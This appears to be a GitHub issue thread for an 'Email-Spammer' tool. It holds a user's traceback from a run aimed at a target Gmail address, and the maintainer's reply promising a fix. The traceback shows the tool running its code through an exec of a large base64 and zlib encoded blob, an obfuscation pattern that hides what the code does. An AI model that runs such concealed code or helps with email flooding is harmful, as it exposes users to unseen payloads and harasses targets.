### ISSUE TITLE
error

### ISSUE THREAD

**Issue by RakaSkuyCuy** [mishakorzik/Email-Spammer#16]
[>] Prepare for spam and attack ...
Email: 1  Target: kontol@gmail.com  Speed: fast

Starting TLS - server0.starttls()
Connecting - server0.login(u, p)
Traceback (most recent call last):
  File "/home/kensploit/Email-Spammer/main.py", line 2, in <module>
    exec(zlib.decompress(base64.b64decode('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')))
  File "<string>", line 207, in <module>
NameError: name 'pwd' is not defined

**Comment by mishakorzik** [comment]
Try another email address I fix it later.
